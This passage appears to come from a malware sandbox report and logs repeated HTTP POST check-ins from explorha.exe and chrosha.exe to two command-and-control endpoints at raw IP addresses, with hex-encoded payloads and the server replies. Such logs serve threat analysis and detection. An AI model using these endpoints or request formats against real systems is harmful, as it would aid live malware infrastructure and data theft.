                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.789638042 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      131192.168.2.549967193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.363692045 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.613923073 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      132192.168.2.549968193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:29.979830027 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.227817059 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      133192.168.2.549969193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.149347067 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.399357080 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.400399923 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.656549931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      134192.168.2.549970193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.480166912 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:30.729028940 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      135192.168.2.549971193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.007756948 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.255181074 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.256380081 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.508797884 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      136192.168.2.549972193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.081756115 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.325599909 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      137192.168.2.549974193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.692141056 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.935770035 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      138192.168.2.549975193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:31.867394924 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.117468119 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.118637085 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.374456882 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      139192.168.2.549976193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.182086945 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.430222034 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      140192.168.2.549977193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.725755930 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.974592924 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.977405071 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.231810093 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      141192.168.2.549978193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:32.792309999 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.039561033 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      142192.168.2.549979193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.289073944 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.537179947 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      143192.168.2.549980193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:33.585074902 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
